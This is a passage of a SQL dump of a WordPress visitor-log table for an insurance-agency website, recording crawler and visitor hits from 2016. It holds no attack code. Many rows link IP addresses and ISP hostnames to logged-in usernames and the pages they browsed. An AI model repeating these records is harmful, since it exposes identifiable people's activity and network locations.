;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7965,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659046','184.154.139.23','placeholder.sitelock.com','/?p=303','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7967,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659047','184.154.139.23','placeholder.sitelock.com','/?p=311','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7968,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659048','184.154.139.23','placeholder.sitelock.com','/?p=319','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7970,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659048','184.154.139.23','placeholder.sitelock.com','/?p=277','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7971,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659049','184.154.139.23','placeholder.sitelock.com','/?p=288','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7974,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659050','184.154.139.23','placeholder.sitelock.com','/?p=171','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7976,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659050','184.154.139.23','placeholder.sitelock.com','/?p=9','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7977,'0b_f99d8d2fe0be37eab8d79fe0b8267670','1458659051','184.154.139.23','placeholder.sitelock.com','/?p=347','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','3','0',0),(7980,'0b_e7acf8d26a88c5e4b6f1e71d2f7f8f0c','1458660485','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(7983,'0b_e7acf8d26a88c5e4b6f1e71d2f7f8f0c','1458660488','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','0',0),(7985,'0b_e7acf8d26a88c5e4b6f1e71d2f7f8f0c','1458660504','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','','','0','51',0),(7988,'0b_ede114f3090b3ce2e032a90ce8707349','1458660576','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7989,'0b_ede114f3090b3ce2e032a90ce8707349','1458660579','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(7992,'0b_e7acf8d26a88c5e4b6f1e71d2f7f8f0c','1458660599','108.29.7.204','pool-108-29-7-204.nycmny.fios.verizon.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(7994,'0b_73bba4c768fcfc6b53653e0b4ac28ff5','1458660600','108.58.88.178','ool-6c3a58b2.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1366 x 768','','','','','','0','0',0),(7995,'0b_4afefe1e1858bd8c98eca86ccef5a863','1458662208','107.21.1.8','ec2-107-21-1-8.compute-1.amazonaws.com','/','Mozilla/5.0 (compatible; DuckDuckGo-Favicons-Bot/1.0; +http://duckduckgo.com)','http://www.empireins.com/','',0,'','','us','','','','','','','0','0',0),(7998,'0b_a524865f236e45614ea1ab2c25d97427','1458662465','66.115.75.204','66.115.75.204','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','https://www.google.com/','_notprovided_',1,'Win7','Chrome 49','us','','Google','','','','','0','0',0),(8001,'0b_a524865f236e45614ea1ab2c25d97427','1458662575','66.115.75.204','66.115.75.204','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8003,'0b_c196a81594c25dc1e074585b5ef89fc1','1458664120','66.249.83.209,108.41.135.17','pool-108-41-135-17.nycmny.fios.verizon.net','/quotes.htm','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','us','','','','','','','0','0',0),(8004,'0b_6bb54914f59cd18d51a00902e02823ac','1458667096','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(8007,'0b_6bb54914f59cd18d51a00902e02823ac','1458667097','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(8010,'0b_9c1d3c5d6a860c6ead025142a71101ed','1458667115','67.85.210.17','ool-4355d211.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','0',0),(8013,'0b_9c1d3c5d6a860c6ead025142a71101ed','1458667116','67.85.210.17','ool-4355d211.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','0',0),(8015,'0b_9c1d3c5d6a860c6ead025142a71101ed','1458667119','67.85.210.17','ool-4355d211.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(8016,'0b_9c1d3c5d6a860c6ead025142a71101ed','1458667127','67.85.210.17','ool-4355d211.dyn.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win8','Chrome 49','us','1600 x 900','','','','Biny1280','','0','51',0),(8019,'0b_1d40f8b71bfbb65d709de22b35ab85c5','1458667139','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(8022,'0b_1d40f8b71bfbb65d709de22b35ab85c5','1458667140','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(8024,'0b_1d40f8b71bfbb65d709de22b35ab85c5','1458667142','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','','','0','0',0),(8025,'0b_1d40f8b71bfbb65d709de22b35ab85c5','1458667162','24.213.178.195','rrcs-24-213-178-195.nyc.biz.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.93 Safari/537.36 OPR/32.0.1948.89','http://www.empireins.com/agent-tools/','',0,'Win8','Google Chrome','us','1920 x 1080','','','','Shmuli','','0','51',0),(8027,'0b_7885121e3dcc2770c70de64cefaeedb4','1458667605','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8028,'0b_7885121e3dcc2770c70de64cefaeedb4','1458667608','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8031,'0b_3b483b927c6cd1e6968c7ecf57759040','1458667710','23.30.78.129','23-30-78-129-static.hfc.comcastbusiness.net','/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','','',0,'Win10','','us','1920 x 1080','','','','','','0','0',0),(8033,'0b_3b483b927c6cd1e6968c7ecf57759040','1458667712','23.30.78.129','23-30-78-129-static.hfc.comcastbusiness.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','1920 x 1080','','','','','','0','0',0),(8036,'0b_3b483b927c6cd1e6968c7ecf57759040','1458667716','23.30.78.129','23-30-78-129-static.hfc.comcastbusiness.net','/agent-tools/','Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; Touch; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win10','','us','1920 x 1080','','','','','','0','0',0),(8039,'0b_37625c9866151c3438630043e2c68994','1458668322','66.249.83.209,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(8040,'0b_6bb54914f59cd18d51a00902e02823ac','1458670263','108.58.88.178','ool-6c3a58b2.static.optonline.net','/forms/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(8042,'0b_5231c403f860d40f21a097f67b5a4023','1458670682','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(8043,'0b_5231c403f860d40f21a097f67b5a4023','1458670688','67.244.116.42','cpe-67-244-116-42.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'WinVista','Chrome 49','us','','','','','','','0','0',0),(8045,'0b_81738bb2faa93befe5f136728240902d','1458672630','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1366 x 768','','','','jzicher','','0','0',0),(8046,'0b_81738bb2faa93befe5f136728240902d','1458672630','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1366 x 768','','','','jzicher','','0','0',0),(8048,'0b_81738bb2faa93befe5f136728240902d','1458672632','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1366 x 768','','','','jzicher','','0','0',0),(8049,'0b_81738bb2faa93befe5f136728240902d','1458672654','108.58.88.178','ool-6c3a58b2.static.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1366 x 768','','','','jzicher','','0','51',0),(8052,'0b_81738bb2faa93befe5f136728240902d','1458672665','108.58.88.178','ool-6c3a58b2.static.optonline.net','/carrier-field-underwriting-guides/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1366 x 768','','','','jzicher','','0','51',0),(8054,'0b_6f0b3ae64a9aa9d1e21a48d2982de351','1458673188','66.249.83.213,209.64.152.62','209.64.152.62','/','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 Google Favicon','','',0,'Linux','Google Chrome','','','','','','','','0','0',0),(8055,'0b_99fe462a78fde5a3ef6e214622909146','1458673383','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8058,'0b_99fe462a78fde5a3ef6e214622909146','1458673392','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8061,'0b_99fe462a78fde5a3ef6e214622909146','1458673787','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8064,'0b_99fe462a78fde5a3ef6e214622909146','1458673788','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8067,'0b_0c7ffa89310119d3b71405cb9a0d5049','1458674624','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(8069,'0b_0c7ffa89310119d3b71405cb9a0d5049','1458674626','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(8070,'0b_99fe462a78fde5a3ef6e214622909146','1458674746','108.58.88.178','ool-6c3a58b2.static.optonline.net','/wp-admin/user-edit.php?user_id=204','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','3','0',0),(8073,'0b_617ca57900f3e96cca3c7fcc62ddb9a5','1458675093','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8075,'0b_617ca57900f3e96cca3c7fcc62ddb9a5','1458675094','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8076,'0b_3ba969b6f5d0837d1948531adb570312','1458675285','157.55.39.48','msnbot-157-55-39-48.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(8078,'0b_f40f7e056e6d45e27085d6d9ccf32b2f','1458675309','207.46.13.117','msnbot-207-46-13-117.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(8079,'0b_617ca57900f3e96cca3c7fcc62ddb9a5','1458675634','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8081,'0b_617ca57900f3e96cca3c7fcc62ddb9a5','1458675635','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8082,'0b_617ca57900f3e96cca3c7fcc62ddb9a5','1458675705','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8084,'0b_617ca57900f3e96cca3c7fcc62ddb9a5','1458675707','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(8085,'0b_39daee7ebf4a8e60374b0894dc50a0de','1458676283','69.30.213.82','69.30.213.82','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(8087,'0b_39daee7ebf4a8e60374b0894dc50a0de','1458676294','69.30.213.82','69.30.213.82','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(8090,'0b_122f61bb0d85c3787c89c47cfd9ab87b','1458676917','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(8091,'0b_e7901891a13aa9f2ceee875742a6ea09','1458678143','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(8093,'0b_e7901891a13aa9f2ceee875742a6ea09','1458678144','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(8094,'0b_e7901891a13aa9f2ceee875742a6ea09','1458678147','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','','','0','0',0),(8096,'0b_e7901891a13aa9f2ceee875742a6ea09','1458678163','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/life-product-search/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/agent-tools/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(8099,'0b_e7901891a13aa9f2ceee875742a6ea09','1458678175','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','0',0),(8100,'0b_e7901891a13aa9f2ceee875742a6ea09','1458678179','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7','IE 11','us','1600 x 900','','','','Isaacd','','0','51',0),(8102,'0b_91affe0a196df21d77608e7e971d344d','1458678197','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(8105,'0b_91affe0a196df21d77608e7e971d344d','1458678199','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(8108,'0b_91affe0a196df21d77608e7e971d344d','1458678333','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/agent-tools/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(8111,'0b_91affe0a196df21d77608e7e971d344d','1458678379','184.152.70.9','cpe-184-152-70-9.nyc.res.rr.com','/term-quotes/','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1600 x 900','','','','Isaacd','','0','51',0),(8114,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678636','136.243.36.92','blexhn13.webmeup.com','/robots.txt','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(8117,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678637','136.243.36.92','blexhn13.webmeup.com','/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8120,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678646','136.243.36.92','blexhn13.webmeup.com','/about-us/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8121,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678654','136.243.36.92','blexhn13.webmeup.com','/agent-tools/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8123,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678662','136.243.36.92','blexhn13.webmeup.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8124,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678670','136.243.36.92','blexhn13.webmeup.com','/carriers/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8127,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678679','136.243.36.92','blexhn13.webmeup.com','/case-status/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8129,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678687','136.243.36.92','blexhn13.webmeup.com','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8130,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678695','136.243.36.92','blexhn13.webmeup.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8132,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678704','136.243.36.92','blexhn13.webmeup.com','/contact/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8133,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678713','136.243.36.92','blexhn13.webmeup.com','/forms/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8136,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678722','136.243.36.92','blexhn13.webmeup.com','/igo/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8139,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678730','136.243.36.92','blexhn13.webmeup.com','/insentives/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8142,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678743','136.243.36.92','blexhn13.webmeup.com','/licensing-contracting/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8145,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678751','136.243.36.92','blexhn13.webmeup.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8148,'0b_07057b0dfe6d475fcad8e698447d1be5','1458678759','136.243.36.92','blexhn13.webmeup.com','/term-quotes/','Mozilla/5.0 (compatible; BLEXBot/1.0; +http://webmeup-crawler.com/)','','',0,'','','','','','','','','','0','0',0),(8151,'0b_2d1bd0c77336337466189c5d15184472','1458680357','50.108.156.48','50.108.156.48','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','ykaufman','','0','0',0),(8154,'0b_b04c35a0ab84d457206db2b46289a394','1458680630','66.249.73.202','crawl-66-249-73-202.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; 